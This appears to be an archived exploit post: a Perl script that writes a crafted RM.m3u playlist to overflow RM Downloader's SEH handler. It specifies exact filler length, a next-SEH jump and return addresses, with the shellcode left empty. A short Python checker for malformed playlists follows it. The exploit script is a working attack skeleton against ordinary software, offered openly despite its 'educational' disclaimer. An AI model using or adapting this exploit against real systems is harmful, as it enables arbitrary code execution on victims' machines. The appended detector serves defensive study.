
rmdownloaderm3u-overflow.txt

Posted on 20 January 2010

#!/usr/bin/perl -w
# RM Downloader m3u Buffer Overflow (SEH) (Perl Edition)
# Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)
# Written by Jacky
# All Greetz for Peter Van Eeckhoutte and Corelan Team !!!
# I tried to exploit it by a Direct Ret, but on my system it doesn't seem that it's a Direct
# Ret vulnerability, so I tried by SEH and voila!
# THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!

use strict;
use warnings;

my $file  = "RM.m3u";
my $junk  = "A" x 35059;          # filler in front of the SEH record
my $nseh  = "\xeb\x1e\x90\x90";   # next-SEH field: short jump forward plus two NOPs
my $seh   = "\x1F\xEA\x02\x10";   # 0x1002EA1F ::> Thanks for Peter who gave me this
                                  # address and it worked perfectly ;-)
                                  # This address works too ::> 0x01DD1111
my $nops  = "\x90" x 25;
my $esp   = "";                   # shellcode string (encoded payload bytes omitted)
my $junk2 = "A" x 5000;           # trailing filler

my $payload = $junk . $nseh . $seh . $nops . $esp . $junk2;

# Write the playlist in binary mode so the bytes reach the file unchanged.
open(my $out, '>', $file) or die "Cannot open $file: $!";
binmode($out);
print $out $payload;
print "[+]File Created Successfully!\n";
print "[+]Done!\n";
close($out);
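A defender-side check for the kind of malformed playlist this script writes, added here as an example and not part of the original post: it flags .m3u entries that are implausibly long, contain a long run of one byte value, or carry control bytes. The function name, the thresholds and both sample inputs are assumptions constructed for illustration.

```python
import re

MAX_ENTRY_LEN = 2048  # assumed limit; real paths and URLs stay far below this
MAX_RUN = 256         # assumed limit for one byte value repeated back to back

# One byte followed by at least MAX_RUN - 1 copies of itself.
RUN_RE = re.compile(rb"(.)\1{%d,}" % (MAX_RUN - 1), re.DOTALL)


def scan_m3u(data: bytes) -> list[str]:
    """Return findings for one playlist; an empty list means nothing was flagged."""
    findings = []
    for number, line in enumerate(data.splitlines(), start=1):
        if len(line) > MAX_ENTRY_LEN:
            findings.append(
                f"line {number}: {len(line)} bytes exceeds {MAX_ENTRY_LEN}")
        run = RUN_RE.search(line)
        if run:
            findings.append(
                f"line {number}: byte 0x{run.group(1)[0]:02x} "
                f"repeated {len(run.group(0))} times")
        # Playlist entries are text; control bytes other than TAB do not belong.
        control = sum(1 for b in line if (b < 0x20 and b != 0x09) or b == 0x7F)
        if control:
            findings.append(f"line {number}: {control} control byte(s)")
    return findings


# Constructed sample: an ordinary extended playlist.
BENIGN = (b"#EXTM3U\r\n"
          b"#EXTINF:123,Artist - Title\r\n"
          b"C:\\Music\\track01.mp3\r\n")

# Constructed sample: same filler length as the script above, followed by
# harmless placeholder bytes standing in for binary data.
MALFORMED = b"#EXTM3U\n" + b"A" * 35059 + b"\x01\x02" + b"B" * 100 + b"\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, scan_m3u(sample))
```

The length and run thresholds are deliberately loose; tune them against the playlists seen in your own environment before using the check as a mail or download filter.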

 
